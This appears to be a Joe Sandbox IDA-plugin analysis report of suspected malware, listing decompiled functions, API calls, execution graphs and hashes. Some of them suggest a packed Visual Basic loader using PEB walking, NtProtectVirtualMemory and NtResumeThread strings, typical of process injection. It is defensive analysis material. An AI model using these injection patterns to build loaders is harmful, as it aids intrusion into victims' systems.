				_t19 = __ebx;
				while(1) {
					_t10 = E00E1594C(_t19, _t24, _t25, _a4); // executed
					if(_t10 != 0) {
						break;
					}
					if(E00E135E1(_t10, _a4) == 0) {
						_push(1);
						_v16 = "bad allocation";
						_t22 =  &_v28;
						E00E186D3(_t22,  &_v16);
						_v28 = 0xe82d90;
						E00E187DB( &_v28, 0xeabaf8);
						asm("int3");
						_t27 = _t22;
						 *_t27 = 0xe82d90;
						E00E18711(_t22);
						if((_v32 & 0x00000001) != 0) {
							L00E1106C(_t27);
						}
						return _t27;
					} else {
						continue;
					}
					L7:
				}
				return _t10;
				goto L7;
			}












                                                                                                                                        0x00e10ff6
                                                                                                                                        0x00e10ff6
                                                                                                                                        0x00e1100b
                                                                                                                                        0x00e1100e
                                                                                                                                        0x00e11016
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00e11009
                                                                                                                                        0x00e1101c
                                                                                                                                        0x00e11021
                                                                                                                                        0x00e11029
                                                                                                                                        0x00e1102c
                                                                                                                                        0x00e11039
                                                                                                                                        0x00e11041
                                                                                                                                        0x00e11046
                                                                                                                                        0x00e1104b
                                                                                                                                        0x00e1104d
                                                                                                                                        0x00e11053
                                                                                                                                        0x00e1105c
                                                                                                                                        0x00e1105f
                                                                                                                                        0x00e11064
                                                                                                                                        0x00e11069
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00e11009
                                                                                                                                        0x00e1101b
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00E1594C: __FF_MSGBANNER.LIBCMT ref: 00E15963
                                                                                                                                          • Part of subcall function 00E1594C: __NMSG_WRITE.LIBCMT ref: 00E1596A
                                                                                                                                          • Part of subcall function 00E1594C: RtlAllocateHeap.NTDLL(01AE0000,00000000,00000001,00000000,?,?,?,00E11013,?), ref: 00E1598F
                                                                                                                                        • std::exception::exception.LIBCMT ref: 00E1102C
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00E11041
                                                                                                                                          • Part of subcall function 00E187DB: RaiseException.KERNEL32(?,?,?,00EABAF8,00000000,?,?,?,?,00E11046,?,00EABAF8,?,00000001), ref: 00E18830
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.343324723.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.343306683.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.344437354.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.344437354.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.344948720.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.345000305.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_df0000_B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                        • String ID: 9I
                                                                                                                                        • API String ID: 3902256705-3853901842
                                                                                                                                        • Opcode ID: 1b1dbdc16d5d7d4838cf41b198419fe69774e5c5b12d597d7484b50c812a1ca4
                                                                                                                                        • Instruction ID: b106f030bd7d464a0630931428ed808a418722cc92478c3f98180425d903fa1e
                                                                                                                                        • Opcode Fuzzy Hash: 1b1dbdc16d5d7d4838cf41b198419fe69774e5c5b12d597d7484b50c812a1ca4
                                                                                                                                        • Instruction Fuzzy Hash: D1F0283590034DA6CB20BA68ED029EF7BEC9F04350F10206AFA08B61C1DFB18AC0D2D0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00E132DF Relevance: 3.0, APIs: 2, Instructions: 7COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 19 e132df-e132ee call e132ab ExitProcess
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E00E132DF(int _a4) {
				void* _t4;

				E00E132AB(_t4, _a4);
				ExitProcess(_a4);
			}




                                                                                                                                        0x00e132e5
                                                                                                                                        0x00e132ee

                                                                                                                                        APIs
                                                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 00E132E5
                                                                                                                                          • Part of subcall function 00E132AB: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00E132EA,00E11013,?,00E15979,000000FF,0000001E,00000000,?,?,?,00E11013), ref: 00E132BA
                                                                                                                                          • Part of subcall function 00E132AB: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00E132CC
                                                                                                                                        • ExitProcess.KERNEL32 ref: 00E132EE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.343324723.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.343306683.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.344437354.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.344437354.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.344948720.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.345000305.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_df0000_B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2427264223-0
                                                                                                                                        • Opcode ID: b90f23375012cbe4409e7129b37134210cb3db94aa2a72f1bbe6d3bf72e5cf34
                                                                                                                                        • Instruction ID: 45cc867f35c2daf5808069813363b02975aa01c3f6ad5a48ff713c3f3d059c57
                                                                                                                                        • Opcode Fuzzy Hash: b90f23375012cbe4409e7129b37134210cb3db94aa2a72f1bbe6d3bf72e5cf34
                                                                                                                                        • Instruction Fuzzy Hash: C9B09230000208BFCB013F22DC0A8883F69FF00B90B004020F80818031DB72AAD2DA80
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 00E1A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E00E1A395(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                                                                                                                        0x00e1a39a
                                                                                                                                        0x00e1a3aa

                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E18F97,?,?,?,00000000), ref: 00E1A39A
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00E1A3A3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.343324723.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.343306683.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.344437354.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.344437354.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.344948720.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.345000305.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_df0000_B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                        • Opcode ID: 59bac160f1e371da3d12649f5e2dd1790632cb0d2c4985d2764a807d853709bc
                                                                                                                                        • Instruction ID: 82aeead4cf962f1f5849cd3113887df740d16a004a86da575cd4550353c129a3
                                                                                                                                        • Opcode Fuzzy Hash: 59bac160f1e371da3d12649f5e2dd1790632cb0d2c4985d2764a807d853709bc
                                                                                                                                        • Instruction Fuzzy Hash: 61B09231054208BFCA00AB92EC09B883F68EB44AAAF404020F60D94060CB6254948A91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:1.2%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:26
                                                                                                                                        Total number of Limit Nodes:3
                                                                                                                                        execution_graph 23182 561c760 23183 561c790 GetFileVersionInfoSizeW 23182->23183 23185 561c7b4 GetFileVersionInfoW 23183->23185 23186 561c84a 23183->23186 23188 561c7e7 23185->23188 23189 560af3c 23190 560af44 23189->23190 23191 560af80 23190->23191 23193 56095fc 23190->23193 23194 5609621 23193->23194 23195 560960b 23193->23195 23194->23191 23195->23194 23197 56095b4 23195->23197 23198 56095c4 23197->23198 23199 56095e0 23197->23199 23201 560a82c 23198->23201 23199->23194 23202 560a86d 23201->23202 23205 560a708 23202->23205 23204 560a8a6 23204->23199 23207 560a729 23205->23207 23206 560a7a4 23206->23204 23207->23206 23211 5609df4 23207->23211 23209 560a7c0 23209->23206 23210 5609df4 6 API calls 23209->23210 23210->23206 23212 5609e17 23211->23212 23214 5609e20 23212->23214 23215 5609cd8 6 API calls 23212->23215 23214->23209 23215->23214

                                                                                                                                        Executed Functions

                                                                                                                                        Function 0560A504 Relevance: .0, Instructions: 33COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.392310117.0000000005601000.00000020.00000001.01000000.00000010.sdmp, Offset: 05601000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_5601000_cexplorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9cd4197710fa1ea93c942b3be0682a8d5fe3506a41be16571c762be6a95e7e5e
                                                                                                                                        • Instruction ID: ee3dbc54870a6cc2146914f374aec31101d531ee9b21cf913ed2eaa836d24037
                                                                                                                                        • Opcode Fuzzy Hash: 9cd4197710fa1ea93c942b3be0682a8d5fe3506a41be16571c762be6a95e7e5e
                                                                                                                                        • Instruction Fuzzy Hash: 2DF08271604704AECB59FBB8CC5599FB7ACFB4561079015A5A404D37D0EA34AF14E518
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0560AFF0 Relevance: .0, Instructions: 6COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.392310117.0000000005601000.00000020.00000001.01000000.00000010.sdmp, Offset: 05601000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_5601000_cexplorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f8cd5c5639be6c8299dc47c4658b2f268de53f7e986acf187d368744a37de2b0
                                                                                                                                        • Instruction ID: 747d02ae0fc28a6449b6f9744eea9aae73bf8dfde97398da0595222e9f74d204
                                                                                                                                        • Opcode Fuzzy Hash: f8cd5c5639be6c8299dc47c4658b2f268de53f7e986acf187d368744a37de2b0
                                                                                                                                        • Instruction Fuzzy Hash: 53A012106084404AC80CEB1D4C8640F72805940010FC40A14645C953C1FE05856582DB
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0561C760 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 59 561c760-561c7ae GetFileVersionInfoSizeW 63 561c7b4-561c7e5 GetFileVersionInfoW 59->63 64 561c84a-561c85f 59->64 68 561c7e7-561c7ff 63->68 69 561c82d-561c842 63->69 68->69 72 561c801-561c829 68->72 72->69
                                                                                                                                        APIs
                                                                                                                                        • GetFileVersionInfoSizeW.KERNELBASE(00000000), ref: 0561C7A5
                                                                                                                                        • GetFileVersionInfoW.KERNELBASE(00000000), ref: 0561C7DE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.392310117.0000000005611000.00000020.00000001.01000000.00000010.sdmp, Offset: 05611000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_5611000_cexplorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileInfoVersion$Size
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2104008232-0
                                                                                                                                        • Opcode ID: 8bb10cb657b9642a77658423be54acdec8e5c0c33d82afe54bc4384500cbcc57
                                                                                                                                        • Instruction ID: a3c45e30de2cb57e977a33bbc216c9fffae63033268c1cf9f1bfadac516364e1
                                                                                                                                        • Opcode Fuzzy Hash: 8bb10cb657b9642a77658423be54acdec8e5c0c33d82afe54bc4384500cbcc57
                                                                                                                                        • Instruction Fuzzy Hash: F8316170A04248AFEB44DFA9C885DBFBBF8EB48600B5444B9E904D3740EB74EE00D768
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 05627F10 Relevance: .4, Instructions: 408COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.392310117.0000000005611000.00000020.00000001.01000000.00000010.sdmp, Offset: 05611000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_5611000_cexplorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a5bb824cf38b2f2bc9838366f6b37d5470a9f9be4285406c6465cf2079f9e609
                                                                                                                                        • Instruction ID: 24948269efacd64d5450d4d735a6a666c2a545a3ecbc0fad9919ab6d2761c3b2
                                                                                                                                        • Opcode Fuzzy Hash: a5bb824cf38b2f2bc9838366f6b37d5470a9f9be4285406c6465cf2079f9e609
                                                                                                                                        • Instruction Fuzzy Hash: 6A02DE32900635CFDB92CF69C480149B7B6FF8A72432A82D5D854AF229D270BE52DFD1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05605618 Relevance: .0, Instructions: 22COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.392310117.0000000005601000.00000020.00000001.01000000.00000010.sdmp, Offset: 05601000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_5601000_cexplorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ae0e43f82692c6785844f3e70bb209c8b319b1924ab6e756aa91dc1deac9637f
                                                                                                                                        • Instruction ID: 3f9509acde7592336106f0ae7345cc8773615aafe9a10577fe1a70276073e5d1
                                                                                                                                        • Opcode Fuzzy Hash: ae0e43f82692c6785844f3e70bb209c8b319b1924ab6e756aa91dc1deac9637f
                                                                                                                                        • Instruction Fuzzy Hash: 8ED012BA27910256F72EC06E68B0B63054BF750364F25DC29A403D5FE0D565CCD0C920
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05609CD8 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetThreadUILanguage.KERNEL32(?,00000000), ref: 05609CE9
                                                                                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 05609D47
                                                                                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 05609DA4
                                                                                                                                        • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 05609DD7
                                                                                                                                          • Part of subcall function 05609C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,05609D55), ref: 05609CAB
                                                                                                                                          • Part of subcall function 05609C94: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,05609D55), ref: 05609CC8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.392310117.0000000005601000.00000020.00000001.01000000.00000010.sdmp, Offset: 05601000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_5601000_cexplorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$LanguagesPreferred$Language
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2255706666-0
                                                                                                                                        • Opcode ID: 7fa7953b92cadf206429a257ad0e5f27531a229cef8e32f4db4d3c0d366a4094
                                                                                                                                        • Instruction ID: a20d18091c27f469aa41239c6f1a6a5fafead894e9dccc5de246e06f63081c22
                                                                                                                                        • Opcode Fuzzy Hash: 7fa7953b92cadf206429a257ad0e5f27531a229cef8e32f4db4d3c0d366a4094
                                                                                                                                        • Instruction Fuzzy Hash: AD315C70E0021A9BCB14EBA4C884ABFB7BAFF04310F006569E511E73D2EB749A05CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:0.8%
                                                                                                                                        Dynamic/Decrypted Code Coverage:84.7%
                                                                                                                                        Signature Coverage:34.7%
                                                                                                                                        Total number of Nodes:98
                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                        execution_graph 1289 7b1bdb 1290 7b1bec TerminateProcess 1289->1290 1316 7b0e7b 1317 7b0e9f 1316->1317 1320 7b106a GetPEB 1317->1320 1319 7b0f10 1333 7b1215 NtProtectVirtualMemory 1320->1333 1322 7b1157 1322->1319 1323 7b115a 1327 7b11c3 1323->1327 1328 7b117c 1323->1328 1324 7b109f 1324->1322 1324->1323 1330 7b10c8 1324->1330 1326 7b1212 1326->1319 1336 7b1215 NtProtectVirtualMemory 1327->1336 1335 7b1215 NtProtectVirtualMemory 1328->1335 1330->1330 1334 7b1215 NtProtectVirtualMemory 1330->1334 1332 7b11c0 1332->1319 1333->1324 1334->1322 1335->1332 1336->1326 1361 7b16d9 1362 7b1233 GetPEB 1361->1362 1364 7b16df 1362->1364 1363 7b1bef TerminateProcess 1364->1363 1365 7b1bf9 1364->1365 1368 7b1b6b 1365->1368 1367 7b2f95 1369 7b1233 GetPEB 1368->1369 1370 7b1b71 1369->1370 1370->1367 1383 47cb24 __vbaChkstk __vbaStrCopy 1384 47cb6b #571 1383->1384 1385 47cb78 #563 #610 __vbaVarTstEq __vbaFreeVar 1383->1385 1384->1385 1386 47cbd7 #711 __vbaVarMove __vbaR8IntI4 1385->1386 1387 47cbca __vbaStrCopy 1385->1387 1388 47cc0f __vbaNew2 1386->1388 1389 47cc2a 1386->1389 1387->1386 1388->1389 1390 47cc88 1389->1390 1391 47cc68 __vbaHresultCheckObj 1389->1391 1392 47ccde 1390->1392 1393 47ccbe __vbaHresultCheckObj 1390->1393 1391->1390 1394 47cce5 7 API calls 1392->1394 1393->1394 1395 47cdc4 7 API calls 1394->1395 1309 7b015f 1313 7b1233 GetPEB 1309->1313 1311 7b0165 SetErrorMode SetErrorMode 1312 7b0189 1311->1312 1314 7b123f 1313->1314 1314->1311 1314->1314 1403 7b1dff 1404 7b1233 GetPEB 1403->1404 1405 7b1e05 1404->1405 1408 7b12a2 GetPEB 1405->1408 1407 7b1e1a 1408->1407 1346 7b2453 GetPEB 1347 7b2464 1346->1347 1396 40112a __vbaExceptHandler 1409 47c9cd 11 API calls 1410 47cb14 1409->1410 1292 7b106a GetPEB 1305 7b1215 NtProtectVirtualMemory 1292->1305 1294 7b1157 1295 7b115a 1299 7b11c3 1295->1299 1300 7b117c 1295->1300 1296 7b109f 1296->1294 1296->1295 1302 7b10c8 1296->1302 1298 7b1212 1308 7b1215 NtProtectVirtualMemory 1299->1308 1307 7b1215 NtProtectVirtualMemory 1300->1307 1302->1302 1306 7b1215 NtProtectVirtualMemory 1302->1306 1304 7b11c0 1305->1296 1306->1294 1307->1304 1308->1298 1348 7b1c49 1349 7b1c4a 1348->1349 1352 7b1cb4 1349->1352 1353 7b1cba 1352->1353 1356 7b1dbb 1353->1356 1355 7b3220 1357 7b1dc7 1356->1357 1360 7b12a2 GetPEB 1357->1360 1359 7b1dd9 1359->1355 1360->1359 1397 7b1709 1399 7b1842 1397->1399 1398 7b1bef TerminateProcess 1399->1398 1400 7b1bf9 1399->1400 1401 7b1b6b GetPEB 1400->1401 1402 7b2f95 1401->1402 1337 7b066f 1338 7b1233 GetPEB 1337->1338 1339 7b0675 1338->1339 1340 7b106a 2 API calls 1339->1340 1341 7b0686 1340->1341 1344 7b12af GetPEB 1341->1344 1343 7b068b 1345 7b12cf 1344->1345 1345->1343 1371 7b22ac 1372 7b1233 GetPEB 1371->1372 1373 7b22b2 1372->1373 1315 401358 #100 1380 7b1b64 1381 7b1b71 1380->1381 1382 7b1233 GetPEB 1380->1382 1382->1381

                                                                                                                                        Executed Functions

                                                                                                                                        Function 007B1215 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 89 7b1215-7b1230 NtProtectVirtualMemory
                                                                                                                                        APIs
                                                                                                                                        • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000000,?,007B109F,00000040,007B0686,00000000,00000000,00000000,00000000,00000000), ref: 007B122E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361280175.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2706961497-0
                                                                                                                                        • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                                                                                                                        • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                                                                                                                                        • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                                                                                                                        • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 007B1233 Relevance: .0, Instructions: 41COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 90 7b1233-7b123c GetPEB 91 7b123f-7b124a 90->91 91->91 92 7b124c-7b1253 91->92 92->91 93 7b1255-7b126b 92->93 94 7b126e-7b1271 93->94 94->94 95 7b1273-7b127c 94->95 95->94 97 7b127e-7b127f 95->97 98 7b1281-7b1284 97->98 99 7b1285 97->99 98->99 99->94 100 7b1287-7b12a1 99->100
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361280175.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0234486e718de8fff341597eb8db90d4ab84f649a936077630535bbb9103ba92
                                                                                                                                        • Instruction ID: 76aa9f028f5b3d1e3602afb15c4001f45ac5aed7027763c5f387c1b8c0f20105
                                                                                                                                        • Opcode Fuzzy Hash: 0234486e718de8fff341597eb8db90d4ab84f649a936077630535bbb9103ba92
                                                                                                                                        • Instruction Fuzzy Hash: E2012C71641210DFD720CF48D9C0E96B3E8FB19760F8584A9E944DB611C278EC40CA62
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 007B015F Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 322COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNELBASE(00000800), ref: 007B0170
                                                                                                                                        • SetErrorMode.KERNELBASE(00000000), ref: 007B0178
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361280175.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_update.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID: NtResumeThread$UnmapViewOfFile$ntdll
                                                                                                                                        • API String ID: 2340568224-2859181515
                                                                                                                                        • Opcode ID: a4c7b0bcf98bf6b787b11c28e7bed2fde61d16ed8fad31db22191ff2cffd75fa
                                                                                                                                        • Instruction ID: 6abf2804729c01489519d019d866183f424b3d6b682b49ad7d2ad7a0c4c8c2d2
                                                                                                                                        • Opcode Fuzzy Hash: a4c7b0bcf98bf6b787b11c28e7bed2fde61d16ed8fad31db22191ff2cffd75fa
                                                                                                                                        • Instruction Fuzzy Hash: 8B115C359072889EDF255FB4451F7FE3B21BB16310F148000E90A69023DE3C6A0B5788
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00401358 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 40 401358-401380 #100
                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                        			_entry_(signed int __eax, intOrPtr __ebx, intOrPtr* __ecx, void* __edx, void* __fp0) {
				intOrPtr* _t5;

				_push("VB5!6&*"); // executed
				L00401350(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t5 = __eax + 1;
				 *_t5 =  *_t5 + _t5;
				 *_t5 =  *_t5 + _t5;
				 *_t5 =  *_t5 + _t5;
				 *((intOrPtr*)(__ecx + 0x53)) =  *((intOrPtr*)(__ecx + 0x53)) + __edx;
				_push(__ebx);
				asm("out dx, eax");
				 *__ecx = __ebx;
				return _t5;
			}




                                                                                                                                        0x00401358
                                                                                                                                        0x0040135d
                                                                                                                                        0x00401362
                                                                                                                                        0x00401364
                                                                                                                                        0x00401366
                                                                                                                                        0x00401368
                                                                                                                                        0x0040136a
                                                                                                                                        0x0040136c
                                                                                                                                        0x0040136d
                                                                                                                                        0x0040136f
                                                                                                                                        0x00401371
                                                                                                                                        0x00401373
                                                                                                                                        0x00401375
                                                                                                                                        0x00401378
                                                                                                                                        0x0040137c
                                                                                                                                        0x00401380

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000003.00000002.361064141.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000003.00000002.360921697.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000003.00000002.361064141.0000000000406000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000003.00000002.361064141.0000000000473000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000003.00000002.361209641.000000000047E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                        • Associated: 00000003.00000002.361215792.000000000047F000.00000002.00000001.01000000.00000008.sdmpDownload File
